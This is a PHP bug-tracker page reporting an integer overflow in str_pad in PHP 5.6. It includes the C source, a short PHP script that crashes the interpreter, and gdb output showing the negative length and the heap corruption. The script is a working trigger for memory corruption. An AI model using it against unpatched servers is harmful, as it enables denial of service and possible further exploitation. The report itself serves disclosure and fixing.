|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-09-02 06:23 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-09-02 06:23 UTC] stas@php.net
[2016-09-05 05:29 UTC] minhrau dot vc dot 365 at gmail dot com
[2016-09-13 04:13 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-09-13 04:13 UTC] stas@php.net
[2017-02-13 01:31 UTC] stas@php.net
-Type: Security
+Type: Bug
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Fri May 17 20:01:35 2024 UTC |
Description: ------------ There is integer overflow in str_pad function, check comment below: PHP_FUNCTION(str_pad) { ... int i, left_pad=0, right_pad=0; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|sl", &input, &input_len, &pad_length, &pad_str_val, &pad_str_len, &pad_type_val) == FAILURE) { return; } ... num_pad_chars = pad_length - input_len; ... result = (char *)emalloc(input_len + num_pad_chars + 1); ... /* First we pad on the left. */ for (i = 0; i < left_pad; i++) result[result_len++] = pad_str_val[i % pad_str_len]; /* Then we copy the input string. */ memcpy(result + result_len, input, input_len); result_len += input_len; /* Finally, we pad on the right. */ for (i = 0; i < right_pad; i++) result[result_len++] = pad_str_val[i % pad_str_len]; //result_len will be negative, lead to heap corruption Test script: --------------- <?php ini_set('memory_limit', -1); $str = str_repeat('a', 0xffffffff/2); var_dump(strlen($str)); $str1 = str_pad($str, 2300000000, "="); //crash ?> Expected result: ---------------- No Crash Actual result: -------------- Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php teststr_pad_negative.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". int(2147483647) Program received signal SIGSEGV, Segmentation fault. 0x00000000007ffd01 in zif_str_pad (ht=3, return_value=0x7ffff7fa0cf0, return_value_ptr=0x7ffff7f6b160, this_ptr=0x0, return_value_used=1) at /home/minhrau/PHP-5.6.24/ext/standard/string.c:5333 5333 result[result_len++] = pad_str_val[i % pad_str_len]; (gdb) b string.c:5306 Breakpoint 2 at 0x7ffc11: file /home/minhrau/PHP-5.6.24/ext/standard/string.c, line 5306. (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php teststr_pad_negative.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". int(2147483647) Breakpoint 2, zif_str_pad (ht=3, return_value=0x7ffff7fa0cf0, return_value_ptr=0x7ffff7f6b160, this_ptr=0x0, return_value_used=1) at /home/minhrau/PHP-5.6.24/ext/standard/string.c:5306 5306 switch (pad_type_val) { (gdb) p num_pad_chars $1 = 152516353 (gdb) p input_len $2 = 2147483647 (gdb) p input_len + num_pad_chars + 1 $3 = 2300000001 (gdb) b string.c:5333 Breakpoint 3 at 0x7ffcd6: file /home/minhrau/PHP-5.6.24/ext/standard/string.c, line 5333. (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00000000007ffd01 in zif_str_pad (ht=3, return_value=0x7ffff7fa0cf0, return_value_ptr=0x7ffff7f6b160, this_ptr=0x0, return_value_used=1) at /home/minhrau/PHP-5.6.24/ext/standard/string.c:5333 5333 result[result_len++] = pad_str_val[i % pad_str_len]; (gdb) p result_len $5 = -2147483647 (gdb) p right_pad $7 = 152516353